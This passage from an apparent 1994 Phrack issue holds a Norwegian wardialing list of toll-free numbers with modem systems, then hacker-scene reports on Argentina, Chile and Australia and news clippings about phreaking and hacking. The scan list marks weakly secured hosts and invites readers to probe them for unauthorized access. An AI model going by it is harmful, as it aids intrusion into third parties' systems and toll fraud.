use it for ANY destructive purposes whatsoever.
WARNING: Unauthorized use of PBX and other communications equipment
owned by others, be it private or business, is illegal and may
result in banishment from the Norwegian telephone company (Tele-
verket) and/or punishment by law.
---
After many sporadic travels over the phone network, in other words scanning
the number region 800 3xxxx, I've come across several interesting things. I
therefore thought it was in its right place to make a complete list of which
numbers have a carrier and which have not. The carriers only apply to modems.
Televerket has (currently) allocated the region 800 30000 to 800 3500 for
these services.
These lines are 100% phreefone, which means that the owner of these services
pays for the conversation plus a surcharge per unit. This allows for long
permutations of numbers and passwords without adding to your own phone bill.
On the other hand, the owner of the line will have a phonebill which equals
American Express's.
Televerket and/or the company/person supplying the service(s) have NO problem
finding out what the caller's number is. This is regardless whether or not
you have filled in the "don't reveal my number to those I call" part of
Televerket's connection form/document. Therefore, nosing around these numbers
should be done with some care.
I haven't tried blueboxing 800 numbers (too much work for something which is
free in the first place), but theoretically it is possible. [Codex: Would
this lessen the number identification risk?]
I had severe difficulties with a number which answered with an 1800Hz tone
in 1 second, after which it became silent. This box phoned me in intervals
of 5 minutes from 12:00 the next day -- in other words, an automatic
WarDial :/. If you discover the same problem, the following solution is
a guaranteed success: Program your local trunk to send all incoming calls
to ANOTHER number which answers with an 1800Hz tone. Let this be active an
hour's time, and you should be rid of it.
- MODEM -
The list of numbers where modem carriers are commented with a single line. I
haven't (at the time of writing) done a deeper investigation of any of the
services, so none of them should be inactive.
There are several interesting things -- especially the gateways and the
X.25 PAD. Please note that the security at most of the systems are pretty
good. Obscure terminal types, data locks and systems which won't identify
themselves are the most common types. Someone has done a good job in making
the system safe from unauthorized sources. However, as said before,
phreefone numbers can be exposed to attacks and permutations of zimmering
quantities.
When I had a look at the unidentified services, the best way to connect was
using a raw-mode tty which won't accept special characters. If you run a
cooked-mode terminal, the text will become even more unreadable.
-- Modem carrier tones ------------------------------------------------------
80030004 - Data Lock (1)
80030010 - *no output*
80030067 - *no output*
80030068 - Courier ASCII Dev. adapter
80030078 - Courier ASCII Dev. adapter
80030095 - Modem Outdial (password)
80030115 - *no output*
80030130 - *uknown*
80030180 - *uknown*
80030225 - *no output*
80030301 - *no output*
80030404 - *unknown* - prompts @ter
80030456 - *unknown* - terminal
80030485 - *unknown*
80030456 - Data Lock 4000 (1)
80030514 - garbage - password
80030606 - *no output*
80031040 - *no output*
80031065 - *no output*
80031315 - IBM Aix v3 RISC system/6000 (2)
80031470 - garbage
80031490 - Dr V.Furst. Med. Lab
80031666 - prompts - @ter
80031815 - prompts - <
80031920 - *unknown* - password
80031950 - *unknown* - hangup after 5 seconds
80032165 - Dr V.Furst. Med. Lab
80032340 - *uknown*
80032410 - Wangvs VAX/VMS
80032470 - *no output*
80032480 - Perle Model 3i - V 02.00G - Apotekernes F. Innkj
80032590 - *unknown* - password
80032635 - *unknown* - terminal
80033338 - TSS Gateway (3)
80033443 - *no output*
80033490 - *no output*
80033580 - *unknown* - hangup after 5 seconds
80033601 - *no output*
80033620 - TIU Gateway (3)
80033720 - *no output*
80033815 - *unknown* - hangup after 5 seconds
80033914 - *unknown* dumps lots of texts [Codex: What type?]
80034248 - *unknown* - prompts for login
80034866 - X.25 PAD
(1) DATA LOCK
If someone can get into one of these, he/she can look forward to getting
a Nobel prize. Data locks are modem front-end protectors, almost
impossible to crack without physical access.
(2) IBM AIX
AIX is one of the best flavors of UNIX there is (even though it was
made by IBM) -- unfortunately the security at this site was so terrible
that anyone with a minimal knowledge of UNIX and access to this machine
could pull it apart blindfolded (making the life really unpleasant for
the estate agents who own the LAN. Write me for an account ;).
(3) GATEWAYS
Free internet access within grasping distance if you can break through.
Not easy, but possible. ;) I am already working on it, so I'm not sure
how long it will take until they increase the security.
[Codex: Comment about Study-By-Byte removed, as I didn't know what to call
the school in English ;). Another fact was that since no number was provided,
and little seemed to be gained by access to this site anyway, I figured it
wasn't too important. Get hold of cyb3rF is you really think it's needed.]
-- End of modem carrier listing ---------------------------------------------
- VOICE/PBX/FAX -
Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx
region which answer. Which is what, I'll leave up all you people out there.
I have mapped some of the list, but won't spread it [Codex: Yet? ;)].
Only one number per line is noted down. This is to easy the job for everyone
who's going to (and you will try ;) run these numbers through their scanner
scripts on the lookout for PBX's and other oddities.
Good luck guys!
cyber aktiF - 01/02/94
-- Answering 800 3xxxx services ---------------------------------------------
80030000
80030001
80030002
80030003
80030005
80030006
80030007
80030008
80030009
80030011
80030012
80030014
80030015
80030016
80030017
80030018
80030019
80030022
80030023
80030024
80030025
80030027
80030028
80030029
80030030
80030032
80030033
80030035
80030036
80030037
80030043
80030044
80030045
80030046
80030048
80030050
80030051
80030053
80030055
80030057
80030058
80030060
80030065
80030066
80030070
80030071
80030072
80030073
80030074
80030075
80030077
80030080
80030082
80030088
80030094
80030096
80030097
80030098
80030099
80030100
80030101
80030102
80030103
80030105
80030106
80030110
80030111
80030113
80030114
80030116
80030120
80030131
80030136
80030140
80030144
80030151
80030155
80030160
80030166
80030170
80030171
80030175
80030177
80030189
80030190
80030195
80030199
80030200
80030202
80030203
80030205
80030210
80030211
80030212
80030213
80030215
80030222
80030227
80030230
80030233
80030235
80030239
80030250
80030255
80030258
80030260
80030265
80030270
80030275
80030277
80030288
80030290
80030294
80030295
80030297
80030299
80030300
80030302
80030303
80030305
80030306
80030308
80030310
80030311
80030313
80030315
80030318
80030319
80030322
80030323
80030330
80030333
80030336
80030337
80030340
80030344
80030345
80030355
80030360
80030363
80030366
80030377
80030380
80030388
80030390
80030395
80030400
80030401
80030407
80030408
80030411
80030415
80030420
80030422
80030433
80030440
80030445
80030450
80030452
80030466
80030470
80030472
80030475
80030480
80030488
80030490
80030495
80030500
80030501
80030502
80030511
80030520
80030522
80030531
80030540
80030545
80030550
80030555
80030560
80030565
80030566
80030570
80030571
80030580
80030585
80030600
80030601
80030603
80030600
80030601
80030603
80030610
80030616
88030640
80030650
80030666
80030670
80030680
80030683
80030690
80030700
80030701
80030707
80030725
80030730
80030750
80030770
80030777
80030788
80030800
80030803
80030811
80030828
80030830
80030840
80030844
80030850
80030855
80030860
80030866
80030870
80030875
80030880
80030888
80030889
80030890
80030900
80030906
80030910
80030911
80030915
80030920
80030922
80030930
80030940
80030950
80030955
80030959
80030960
80030975
80030990
80030994
80031000
80031001
80031006
80031007
80031008
80031010
80031020
80031030
80031031
80031043
80031044
80031048
80031055
80031058
80031060
80031064
80031066
80031070
80031075
80031080
80031082
80031085
80031092
80031097
80031103
80031108
80031110
80031111
80031112
80031113
80031122
80031123
80031140
80031144
80031150
80031151
80031155
80031160
80031166
80031180
80031188
80031200
80031210
80031211
80031212
80031220
80031221
80031229
80031230
80031231
80031234
80031240
80031241
80031244
80031250
80031255
80031266
80031288
80031290
80031300
80031306
80031310
80031313
80031318
80031336
80031340
80031343
80031344
80031355
80031360
80031366
80031400
80031404
80031410
80031412
80031420
80031422
80031430
80031440
80031441
80031447
80031455
80031460
80031466
80031510
80031535
80031540
80031545
80031550
80031560
80031566
80031570
80031571
80031580
80031590
80031600
80031606
80031610
80031611
80031620
80031630
80031631
80031640
80031660
80031661
80031680
80031688
80031690
80031700
80031701
80031707
80031713
80031717
80031740
80031760
80031777
80031780
80031800
80031801
80031809
80031811
80031820
80031830
80031831
80031833
80031840
80031850
80031851
80031866
80031880
80031888
80031900
80031907
80031919
80031927
80031937
80031947
80031957
80031958
80031959
80031970
80031994
80031995
80031999
80032000
80032001
80032002
80032005
80032008
80032011
80032020
80032032
80032040
80032062
80032066
80032080
80032092
80032101
80032105
80032113
80032123
80032130
80032140
80032144
80032150
80032152
80032155
80032166
80032173
80032176
80032200
80032202
80032210
80032212
80032220
80032222
80032223
80032225
80032232
80032255
80032280
80032320
80032323
80032325
80032330
80032332
80032333
80032350
80032355
80032383
80032390
80032399
80032400
80032412
80032415
80032420
80032424
80032425
80032432
80032444
80032450
80032455
80032460
80032466
80032500
80032511
80032520
80032525
80032530
80032540
80032550
80032555
80032560
80032565
80032571
80032578
80032600
80032639
80032660
80032666
80032668
80032680
80032690
80032750
80032754
80032808
80032820
80032832
80032850
80032875
80032880
80032899
80032900
80032907
80032927
80032987
80032990
80032997
80033000
80033003
80033011
80033013
80033016
80033300
80033301
80033302
80033303
80033304
80033305
80033306
80033310
80033311
80033312
80033313
80033315
80033317
80033318
80033320
80033321
80033322
80033325
80033330
80033331
80033332
80033333
80033334
80033335
80033341
80033345
80033350
80033353
80033355
80033370
80033372
80033373
80033377
80033380
80033383
80033385
80033394
80033399
80033410
80033411
80033420
80033432
80033433
80033440
80033444
80033445
80033448
80033450
80033455
80033456
80033460
80033466
80033477
80033488
80033499
80033500
80033505
80033510
80033515
80033520
80033535
80033540
80033550
80033555
80033566
80033567
80033570
80033577
80033585
80033590
80033600
80033610
80033611
80033616
80033622
80033626
80033630
80033633
80033644
80033650
80033655
80033660
80033666
80033670
80033678
80033690
80033711
80033717
80033730
80033733
80033740
80033760
80033770
80033775
80033777
80033779
80033780
80033788
80033800
80033808
80033810
80033818
80033820
80033833
80033838
80033840
80033844
80033855
80033856
80033860
80033866
80033880
80033888
80033890
80033899
80033900
80033920
80033930
80033933
80033940
80033950
80033960
80033970
80033977
80033980
80033990
80033994
80033999
80034000
80034011
80034020
80034022
80034024
80034025
80034030
80034033
80034034
80034035
80034040
80034043
80034044
80034050
80034055
80034070
80034077
80034080
80034088
80034090
80034100
80034110
80034111
80034115
80034123
80034125
80034134
80034135
80034140
80034144
80034150
80034155
80034160
80034166
80034170
80034180
80034210
80034220
80034222
80034240
80034250
80034260
80034266
80034270
80034880
80034888
80034889
80034910
80034966
80034988
80034999
80035000
-- End of list of answering 800 3xxxx services ------------------------------
This file was brought to you in English by Codex/DBA, 26-Apr-1994. I didn't
ask cyb3rF for permission to translate this document, but I hope he won't
mind. I also understand that the document is of varied use to some people
(those of you who can't dial in free to Norway (cc 47), don't bother), but I
thought any information, however useful might be of some interrest to the
English speaking crowd out there.
Re: cyb3rF, Sicko, BattleAng, Maelstrom, Uridium, Enigma, Golan, BadS, vale_
and any other people I've forgotten to mention right now (flame me on
#phreak, guys ;).
I'll be back in Norway in June.
Codex/DBA, 26-Apr-1994.
-- "Men I haelvete gutar, vaent paa meg!!" ----------------------------------
-----------------------------------------------------------------------------
More about the Argentine Internet scenery.
It's difficult to add something to an already good article like Opii's one,
but here is some info which may interest you besides what you already know:
* The local Net started as late as January 1989, when the National Commission
for Atomic Power (CNEA) connected to the BITNET network. The three first
nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 (IBM/370 158),
and ARGCNEA2 (Comparex 7/68), all running RSCS V1. Release3 for data comm.
The node ARGCNEA2 was (I think it still is) the main link in Argentina to
Bitnet. Until late 1992, they still used a manual DIAL-UP LINK (!) to the
Chilean node UCHCECVM (IBM 4341MO2) at the Chile's National University in
Santiago city, connecting at 9600 bps to exchange mail. I'm not sure about
if the Chilean link is still working, due to the existing new leased line
connection of the government's foreign office.
In mid-1990, the national university of La Plata, joined ranks and also
connected to the Bitnet network. The two nodes, CESPIVM1 and CESPIVM2
(Running on IBM mainframes) also served as hosts to a VAX 11-780, and a
experimental link to some computers in Uruguay's (country) national
University.
Another different beast is what's called the RAN network (National Academic
Network), which is nothing more than a UUCP network connecting a hundred
different nodes through the country. Again, until mid-92 they used X.25
ARPAC connections (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the
"international" connection into UUCO. More recently (two months ago), they
have got their own 64kbps leased line to the US, which finally will let
people around the world to mess and GET into our computers :-).
While the project was to connect to Maryland University (financed by the
US National Science Foundation, they love us), I still don't know what's the
host at the other side of the leased line.
Well, that's the end of the FACTS that I have... now some political opinions:
Things are getting a *little* better, but I don't expect any improvements
for "Joe average" user, since to make things work, we must get rid off the
current LD and data monopoly of the two European private telcos that own us.
Until 1999, they have the exclusive right to use and abuse the market of
both voice and data transmissions, and no competition can enter without
passing through their satellite links (and rates). Very nice for a government
that is always speaking of "free markets".
Until we get AT&T and/or MCI competing for the market, we won't have affordable
rates, and US companies like CIS, Delphi, etc. than could be doing BIG
business NOW, will have to wait until late 1999, when the monopoly ends by
law. (Or, BTW: or they can talk to Mr. Al Gore, so he can kick a little our
beloved president to end the telcos ripoff).
Chileans, in contrast, have a lot better scene, with well-established direct
internet links, an X.25 network with 9600bps access through the country, and
even Gopher servers since a long time ago!.
Following is a quick and dirty list of Internet domains for both Chile and
Argentina:
ARGENTINA:
ar.ar (unspecified)
athea.ar (unspecified)
atina.ar (united nations development programme, argentina) (RAN UUCP HOST)
ba.ar (unspecified)
cb.ar (unspecified)
com.ar (unspecified)
edu.ar (unspecified)
gov.ar (government of argentina) <- give my regards to our corrupt gvt!
mz.ar (unspecified)
ncr.ar (national cash register corporation, argentina)
nq.ar (unspecified)
org.ar (centro de estudios de poblacion corrientes',)
sld.ar (unspecified)
subdomain.ar (unspecified)
test.ar (unspecified)
tf.ar (unspecified)
tm.ar (unspecified)
buenosaires.ncr.ar (national cash register corporation, buenos aires, arg)
city.ar.us (unspecified)
datage.com.ar (unspecified)
guti.sld.ar (unspecified)
secyt.gov.ar (unspecified)
unisel.com.ar (unspecified)
unlp.edu.ar (universidad nacional de la plata, argentina)
CHILE:
altos.cl (altos chile limiteda. el corregidor, santiago, chile)
apple.cl (axis calderon, santiago, chile)
ars.cl (ars innovandi (el arte de innovar), chile)
bci.cl (unspecified)
campus.cl (indae limiteda. area de computacion, manuel montt, chile)
cepal.cl (comision economica para america latina (cepal) santiago, chile)
conicyt.cl (unspecified) <-- Government education branch
contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile)
cronus.cl (familia fuentealba olea, chile) <-- a family with their node!
difusion.cl (editorial difusion, chile)
eclac.cl (unspecified)
epson.cl (epson, chile)
eso.cl (european southern observatory la silla, la serena, chile)
frutex.cl (frutexport lota, santiago, chile)
fundch.cl (fundacion, chile)
fwells.cl (fundacion wells claro solar, casilla, temuco, chile)
gob.cl (unspecified) <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet!
ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile)
lascar.cl (university of catolica, chile)
mic.cl (las condes, santiago, chile)
ncr.cl (national cash register corporation, chile)
opta.cl (opta limiteda. las violetas, idencia, santiago, chile)
orden.cl (orden huerfanos piso, fax, santiago, chile)
placer.cl (placer dome) <--- WHAT IS THIZ??? "Pleasure dome?" !!!!!!!!!!
puc.cl (catholic university of chile (universidad catolica de chile)
rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile)
safp.cl (superintendencia de administradoras de fondos de pensiones, chile)
scharfs.cl (scharfstein, las condes, santiago, chile)
sisteco.cl (sisteco, santiago, chile)
sonda.cl (sonda digital teatinos, santiago, chile)
tes.cl (d.c.c. sistemas, chile)
uai.cl (unspecified)
ubiobio.cl (unspecified)
uchile.cl (universidad de chile)
ucv.cl (unspecified)
udec.cl (universidad de concepcion de ingenieria de sistemas,)
unisys.cl (unisys, chile)
unorte.cl (universidad del norte, antofagasta, chile)
usach.cl (universidad de santiago de chile de ingenieria informatica,)
uta.cl (universidad de tarapaca, arica, chile)
utfsm.cl (universidad tecnica de electronica, valparaiso, chile)
ac.cam.cl (unspecified)
agr.puc.cl (agriculture department, catholic university of chile
astro.puc.cl (catholic university of chile (pontificia universidad catolica
bio.puc.cl (catholic university of chile santiago)
cec.uchile.cl (universidad de chile)
cfm.udec.cl (universidad de concepcion, concepcion, chile)
dcc.uchile.cl (department o. de ciencias de la computacion)
dfi.uchile.cl (universidad de chile)
die.udec.cl (universidad de concepcion de ingenieria de sistemas)
dii.uchile.cl (universidad de chile)
dim.uchile.cl (universidad de chile)
dis.udec.cl (universidad de concepcion, concepcion, chile)
disca.utfsm.cl (universidad tecnica federico santa maria, chile)
dpi.udec.cl (universidad de concepcion de ingenieria de sistemas)
elo.utfsm.cl (universidad tecnica federico santa maria, )
finanzas.fundch.cl (fundacion, chile)
fis.utfsm.cl (universidad tecnica federico santa maria,)
inf.utfsm.cl (universidad tecnica federico santa maria,)
ing.puc.cl (engineering, catholic university of chile )
mat.puc.cl (mathematics department, catholic university of chile
mat.utfsm.cl (universidad tecnica federico santa maria,
qui.puc.cl (catholic university of chile santiago)
seci.uchile.cl (universidad de chile)
soft.udec.cl (universidad de concepcion de ingenieria de sistemas,)
-----------------------------------------------------------------------------
Australian Scene Report Part II
by Data King
-------------------------------
This is the sequel to the Australian scene report that appeared in Phrack
Issue 45. There have been a few developments since I wrote that report which I
think people may be interested in.
Old NEWS
~~~~~~~~
But first before I deal with what's new, I need to deal with something that's
old. Shortly after Phrack 45 was published, I received a fakemail that
basically threatened me and also made a lot of claims, I would like to take
this opportunity to reply to the author of this letter.
First of all this person claims I have not been in the scene for ages, well
if I am not in the scene that is news to me!
The letter contained several threats to do something like redirect my
telephone number to a 0055 number, for people outside of Australia, a 0055
is a recorded timed call service.
To this I say: 'Go ahead, if your capable DO IT!'
I wont bother dealing with most of the rubbish contained in the article, it
was just general BS.
Finally I have something to say directly to the person who wrote the mail:
"If your so goddamn good, then don't hide behind fakemail, come out in the
open and let us all fear you, come one get your lame ass on IRC and lets talk!"
Also I was told not to submit anything more to Phrack for publishing or bad
things would happen, Well I guess either I have no phear, or I don't take
these threats seriously.
New NEWS
~~~~~~~~
AusCERT
Australia is forming it's own version of CERT, to be called AusCERT and
based in Queensland, Australia. Everybody is shaking in their boots worrying
- NOT!
Networks
In the last report you may remember I talked about the Australia Military
Network in a very vague fashion, well now I have some more detailed info for
you.
The Australian Defense Forces (ADF) have what they call "the Defense
Integrated Secure Communications Network (DISCON)". This network is
relatively new. Circuit switched operations only began in 1990. Packet
switching came into effect during 1992.
It provides all the ADF's communication needs in terms of data, voice,
video, and so on, secure and non secure communications.
Main control is exercised from Canberra (believed to be from within the DSD
compound at Russell Offices), and the network is interconnected via a total
of 11 ground stations across the country using Aussat.
Also the Australian Federal Police have an internet connection now.
sentry.afp.gov.au is the main machine from what I can tell, from the looks
of it, the machine is either a setup or they don't know much about security.
NeuroCon
There was a Con organized by The Pick held here in Melbourne a little while
ago, from all reports it was a total disaster, once again showing the apathy
of Australian people in the scene.
For Instance the organizers kept the location secret, and where supposed to
pick people up in the city, at several allocated times they did not show up.
When one of the potential attendees rang and asked what was going on they
were told by the organizers: "We are too drunk to come and get you".
Come on guys this is LAME, sure everyone likes a drink, but if you keep the
location secret, make sure someone is able to go and get the people waiting
to be picked up!
HackFEST 94
The Year is quickly approaching an end and as yet I have not managed to
fully organize this event. I am in need of people who wish to speak on various
topics, so if you are so inclined and have an idea, send me mail and we will
see what we can organize.
As always I can be contacted at dking@suburbia.apana.org.au, but please note
my PGP signature has changed, so please do a finger on the account if you want
my new PGP signature.
Information in this article has come from various sources, but they shall
remain nameless as they do not wish the attention of the AFP. They know who
they are, and I send them my thanks - Thanks Guys!
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 28 of 28
PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
PWN PWN
PWN Phrack World News PWN
PWN PWN
PWN Compiled by Datastream Cowboy PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Damn The Torpedoes June 6, 1994
~~~~~~~~~~~~~~~~~~
by Loring Wirbel (Electronic Engineering Times) (Page 134)
On May 3, a gargantuan satellite was launched with little press coverage
from Cape Canaveral.
The $1.5 billion satellite is a joint project of the NSA and the
National Reconnaissance Office. At five tons, it is heavy enough to
have required every bit of thrust its Titan IV launcher could
provide--and despite the boost, it still did enough damage to the
launch-pad water main to render the facility unusable for two months.
The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an
antenna larger than a football field to carry out "hyper-spectral
analysis" -- Reconnaissance Office buzzwords for real-time analysis of
communications in a very wide swath of the electromagnetic spectrum.
Clipper and Digital Signature Standard opponents should be paying
attention to this one. Mentor surprised space analysts by moving into a
geostationary rather than geosynchronous orbit. Geostationary orbit
allows the satellite to "park" over a certain sector of the earth.
This first satellite in a planned series was heading for the Ural
Mountains in Russia at last notice. Additional launches planned for
late 1994 will park future Mentors over the western hemisphere.
According to John Pike of the Federation of American Scientists, those
satellites will likely be controlled from Buckley Field (Aurora,
Colorado), an NSA/Reconnaissance downlink base slated to become this
hemisphere's largest intelligence base in the 1990s.
[Able to hear a bug fart from space. DC to Daylight realtime analysis.
And you Clipper whiners cry about someone listening to your phone calls.
Puh-lease.]
-----------------------------------------------------------------------------
Discovery of 'Data Processing Virus Factory' In Italy February 17, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AFP Sciences
It was learned in Rome on 10 February that a data processing virus
"factory" -- in fact, a program called VCL (Viruses Creation Laboratory),
capable of triggering a virus epidemic--was discovered in Italy
Mr. Fulvio Berghella, deputy directory-general of the Italian Institute
for Bank Data Processing Security (ISTINFORM), discovered what it takes
to enable just about anybody to fabricate data processing viruses; he told
the press that its existence had been suspected for a year and a half and
that about a hundred Italian enterprises had been "contaminated."
An investigation was launched to try to determine the origin of the program,
said Mr. Alessandro Pansa, chief of the "data processing crime" section
of the Italian police. Several copies of VCL were found in various places,
particularly in Rome and Milan.
Producing viruses is very simple with the help of this program, but it is
not easy to find. A clandestine Bulgarian data bank, as yet not identified,
reportedly was behind all this. An international meeting of data processing
virus "hunters" was organized in Amsterdam on 12 February to draft
a strategy; an international police meeting on this subject will be held
next week in Sweden.
Since 1991, the number of viruses in circulation throughout the world
increased 500% to a total of about 10,000 viruses. In Italy, it is not
forbidden to own a program of this type, but dissemination of viruses
is prosecuted.
[So, I take it Nowhere Man cannot ever travel to Italy?]
--------------------------------------------------------------------------
DEFCON TV-News Coverage July 26, 1994
by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles)
[Shot of audience]
Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal
Eisner found at a gathering of hackers on the Las
Vegas strip."
[Shot of "Welcome to Vegas" sign]
[Shot of Code Thief Deluxe v3.5]
[Shot of Dark Tangent talking]
Dark Tangent: "Welcome to the convention!"
[Shot of Voyager hanging with some people]
Hal Eisner: "Well not everyone was welcome to this year's
Def Con II, a national convention for hackers.
Certainly federal agents weren't."
[Shot DTangent searching for a fed]
Dark Tangent: "On the right. Getting closer."
Fed: "Must be me! Thank you."
[Dark Tangent gives the Fed "I'm a Fed" t-shirt]
Hail Eisner: "Suspected agents were ridiculed and given
identifying t-shirts. While conventioneers, some of
[Shot of someone using a laptop]
which have violated the law, and many of which are
[Shot of some guy reading the DefCon pamphlet]
simply tech-heads hungry for the latest theory, got
[Shot of a frequency counter, and a scanner]
to see a lot of the newest gadgetry, and hear some
tough talk from an Arizona Deputy DA that
[Shot of Gail giving her speech]
specializes on computer crime and actually
recognized some of her audience."
Gail: "Some people are outlaws, crooks, felons maybe."
[Shot back of conference room. People hanging]
Hal Eisner: "There was an Alice in Wonderland quality about all
of this. Hackers by definition go where they are not
invited, but so is the government that is trying to
intrude on their privacy."
Devlin: "If I want to conceal something for whatever reason.
I'd like to have the ability to."
Hal Eisner: "The bottom line is that many of the people here
want to do what they want, when they want, and how
they want, without restrictions."
Deadkat: "What we are doing is changing the system, and if you
have to break the law to change the system, so be it!"
Hal Eisner: "That's from residents of that cyberspacious world
[Shot of someone holding a diskette with what is supposed to be codez on the
label]
of behind the computer screen where the shy can be
[Code Thief on the background]
dangerous. Reporting from Las Vegas, Hal Eisner,
Real News.
------------------------------------------------------------------------------
Cyber Cops May 23, 1994
~~~~~~~~~~
by Joseph Panettieri (Information Week) (Page 30)
When Chris Myers, a software engineer at Washington University in
St. Louis, arrived to work one Monday morning last month, he realized
something wasn't quite right. Files had been damaged and a back door
was left ajar. Not in his office, but on the university's computer network.
Like Commissioner Gordon racing to the Batphone, Myers swiftly called the
Internet's guardian, the Computer Emergency Response Team (CERT).
The CERT team boasts impressive credentials. Its 14 team members are
managed by Dain Gary, former director of corporate data security at
Mellon Bank Corp. in Pittsburgh. While Gary is the coach of the CERT
squad, Moira West is the scrambling on-field quarterback. As manager
of CERT's incident-response team and coordination center, she oversees
the team's responses to attacks by Internet hackers and its search for
ways to reduce the Internet's vulnerabilities. West was formerly a
software engineer at the University of York in England.
The rest of the CERT team remains in the shadows. West says
the CERT crew hails from various information-systems backgrounds,
but declines to get more specific, possibly to hide any Achilles'
heels from hackers.
One thing West stresses is that CERT isn't a collection of reformed
hackers combing the Internet for suspicious data. "People have to
trust us, so hiring hackers definitely isn't an option," she says.
"And we don't probe or log-on to other people's systems."
As a rule, CERT won't post an alert until after it finds a
remedy to the problem. But that can take months, giving hackers
time to attempt similar breakins on thousands of Internet hosts
without fear of detection. Yet CERT's West defends this policy:
"We don't want to cause mass hysteria if there's no way to
address a new, isolated problem. We also don't want to alert the
entire intruder community about it."
------------------------------------
Who You Gonna Call?
How to reach CERT
Phone: 412-268-7090
Internet: cert@cert.org
Fax: 412-268-6989
Mail: CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, PA 15213-3890
------------------------------------
[Ask for that saucy British chippie. Her voice will melt you like
butter.
CERT -- Continually re-emphasizing the adage: "You get what you pay for!"]
And remember, CERT doesn't hire hackers, they just suck the juicy bits
out of their brains for free.
------------------------------------------------------------------------------
Defining the Ethics of Hacking August 12, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Amy Harmon (Los Angeles Times) (page A1)
Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer
hackers and phone phreaks -- is having a party.
And perhaps it is just in time. 2600, the hacker magazine Corley
started when he was 23, is a decade old. It has spawned monthly
hacker meetings in dozens of cities. It has been the target of a
Secret Service investigation. It has even gone aboveground, with
newsstand sales of 20,000 last year.
As hundreds of hackers converge in New York City this weekend to celebrate
2600's anniversary, Corley hopes to grapple with how to uphold the
"hacker ethic," an oxymoron to some, in an era when many of 2600's devotees
just want to know how to make free phone calls. (Less high-minded
activities -- like cracking the New York City subway's new electronic
fare card system -- are also on the agenda).
Hackers counter that in a society increasingly dependent on
technology, the very basis for democracy could be threatened by limiting
technological exploration. "Hacking teaches people to think critically about
technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers
on Planet Earth conference this weekend. "The corporations that are building
the technology are certainly not going to tell us, because they're trying to
sell it to us. Whole societies are trusting technology blindly -- they just
believe what the technocrats say."
Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic,
which made waves this year with an article showing that while tapping mobile
phones of criminal suspects with radio scanners, Dutch police tapped into
thousand of other mobile phones.
"What society needs is people who are independent yet knowledgeable,"
Gonggrijp said. 'That's mostly going to be young people, which society is
uncomfortable with. But there's only two groups who know how the phone and
computer systems work, and that's engineers and hackers. And I think that's
a very healthy situation."
[By the way Amy: Phrack always grants interviews to cute, female
LA Times reporters.]
------------------------------------------------------------------------------
Fighting Telephone Fraud August 1, 1994
~~~~~~~~~~~~~~~~~~~~~~~~
by Barbara DePompa (Information Week) (Page 74)
Local phone companies are taking an active role in warning customers of
scams and cracking down on hackers.
Early last month, a 17-year old hacker in Baltimore was caught
red-handed with a list of more than 100 corporate authorization codes that
would have enabled fraud artists to access private branch exchanges and
make outgoing calls at corporate expanse.
After the teenager's arrest, local police shared the list with Bell
Atlantic's fraud prevention group. Within hours, the phone numbers were
communicated to the appropriate regional phone companies and corporate
customers on the list were advised to either change their authorization
codes or shut down outside dialing privileges.
"We can't curb fraud without full disclosure and sharing this type
of vital information" points out Mary Chacanias, manager of
telecommunications fraud prevention for Bell Atlantic in Arlington, VA.
-----------------------------------------------------------------------------
AT&T Forms Team to Track Hackers August 30, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Reuters News Wire)
AT&T Corp.'s Global Business Communications Systems subsidiary said
Wednesday it has formed an investigative unit to monitor, track and
catch phone-system hackers in the act of committing toll fraud.
The unit will profile hacker activity and initiate "electronic
stakeouts" with its business communications equipment in cooperation
with law enforcement agencies, and work with them to prosecute the
thieves.
"We're in a shoot-out between 'high-tech cops' -- like AT&T -- and
'high-tech robbers' who brazenly steal long distance service from our
business customers," said Kevin Hanley, marketing director for business
security systems for AT&T Global Business.
"Our goal is not only to defend against hackers but to get them off the
street."
[Oh my God. Are you scared? Have you wet yourself? YOU WILL!]
-----------------------------------------------------------------------------
Former FBI Informant a Fugitive July 31, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Keith Stone (Daily News)
Computer outlaw Justin Tanner Petersen and prosecutors
cut a deal: The Los Angeles nightclub promoter known in
the computer world as "Agent Steal" would work for the
government in exchange for freedom.
With his help, the government built its case against
Kevin Lee Poulsen, a Pasadena native who pleaded guilty
in June to charges he electronically rigged telephones at
Los Angeles radio stations so he could win two Porsches,
$22,000 and two trips to Hawaii.
Petersen also provided information on Kevin Mitnick, a
Calabasas man wanted by the FBI for cracking computer and
telephone networks at Pacific Bell and the state Department
of Motor Vehicles, according to court records.
Petersen's deal lasted for nearly two years - until
authorities found that while he was helping them undercover,
he also was helping himself to other people's credit cards.
Caught but not cornered, the 34-year-old "Agent Steal" had
one more trick: He admitted his wrongdoing to a prosecutor
at the Los Angeles U.S. Attorney's Office, asked to meet
with his attorney and then said he needed to take a walk.
And he never came back.
A month after Petersen fled, he spoke with a magazine for
computer users about his role as an FBI informant, who he
had worked against and his plans for the future.
"I have learned a lot about how the bureau works. Probably
too much," he said in an interview that Phrack Magazine published
Nov. 17, 1993. Phrack is available on the Internet, a worldwide
network for computer users.
Petersen told the magazine that working with the FBI was fun
most of the time. "There was a lot of money and resources used.
In addition, they paid me well," he said.
"If I didn't cooperate with the bureau," he told Phrack, "I
could have been charged with possession of government material."
"Most hackers would have sold out their mother," he added.
Petersen is described as 5 foot, 11 inches, 175 pounds, with
